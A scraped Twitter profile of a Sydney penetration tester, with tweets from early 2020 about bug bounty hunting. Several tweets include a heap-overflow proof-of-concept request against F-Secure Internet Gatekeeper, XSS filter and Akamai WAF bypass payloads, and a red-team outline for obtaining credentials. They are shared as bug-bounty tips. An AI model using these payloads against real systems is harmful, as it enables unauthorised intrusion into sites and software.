Abartan Dhakal (MAD)   

@imhaxormad

21 | Penetration Tester | leader | Infosec writer| Musician| Poet| Personal Tweets| ambassador | I run NepSec Sydney Meetup

Sydney, New South Wales
Vrijeme pridruživanja: srpanj 2013.

Tweetovi

Blokirali ste korisnika/cu @imhaxormad

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @imhaxormad

  1. Prikvačeni tweet

    Goals for 2019, 1) organise meetups as I promised when I became ambassador for 2) Try my best to join the triage team to work alongside and in 3) Learn more into Pentest and try harder for OSCP 4) join 💪💪 5) Learn more.

    Prikaži ovu nit
    Poništi
  2. 4. velj

    [PoC] Heap Overflow in F-Secure Internet Gatekeeper POST /submit HTTP/1.1 Host: 192.168.0.24:9012 Content-Length: 21487483844 AAAAAAAAAAAAAAAAAAAAAAAAAAA

    Poništi
  3. 4. velj

    ==API TIPS== To welcome the new year, we published a daily tip on API Security & API Pentesting during the month of January 2020. Check out my new article and explore 31 tips + interesting insights about them.

    Poništi
  4. 3. velj

    Hey bug hunters! Want a look at some of the top vulnerabilities ever found on ? They just released the last blog post I wrote before leaving. Enjoy!

    Prikaži ovu nit
    Poništi
  5. 3. velj

    XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()//

    Prikaži ovu nit
    Poništi
  6. 3. velj

    Just discovered a new 0-day RCE in a well known network monitoring software, the code is well written which took me sometime to find the vulnerability. you can exploit it without authentication under some conditions. stay tuned for the full exploit code and a detailed article!

    Poništi
  7. 4. velj
    Poništi
  8. 2. velj

    In collaboration with , we are very pleased to present the worlds first writers challenge coin, the Secjuice Triple Ten. Open to any writer, journalist, researcher or professional focused on information security.

    Poništi
  9. 3. velj
    Poništi
  10. Poništi
  11. 2. velj

    Third episode of HackStart AMA with Coming soon on your screens.

    Poništi
  12. I wish I could go home and not think of anything at all! 😒 Boring weekends fully out of human interaction 😪

    Poništi
  13. 31. sij

    Akamai WAF Bypass, worked on a recent program <x onauxclick=a=alert,a(domain)>click

    Poništi
  14. 31. sij

    The Complete Guide to CORS (In) Security by . Do give it a read because it's very well written. 😋

    Poništi
  15. 31. sij

    If an application uses markdown, make sure to test it for xss. I used [Click here](javascript:alert(1)), to create a link via markdown and when the user clicks on Click here, the xss will get executed. Read this article.

    Poništi
  16. Poništi
  17. 30. sij

    I published another blog today. This is a story about an interesting SQL Injection I found. “A Not-So-Blind RCE with SQL Injection” by Prashant Kumar

    Poništi
  18. 31. sij

    The most transparent article on Heap Exploitation by There are few articles too but this is the best one to understand heap in layman's term.

    Prikaži ovu nit
    Poništi
  19. 30. sij
    Poništi
  20. 29. sij

    How to Red Team #1 - A twitter red team mind map Need credentials from the outside? 1. OSINT (Find e-mail/PII) 2. Social Engineer (Trick someone into clicking an e-mail you sent them w/o a payload) 3. Target External Services (Password Spray or find a vulnerable service )

    Prikaži ovu nit
    Poništi
  21. 30. sij

    Some hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the , !

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·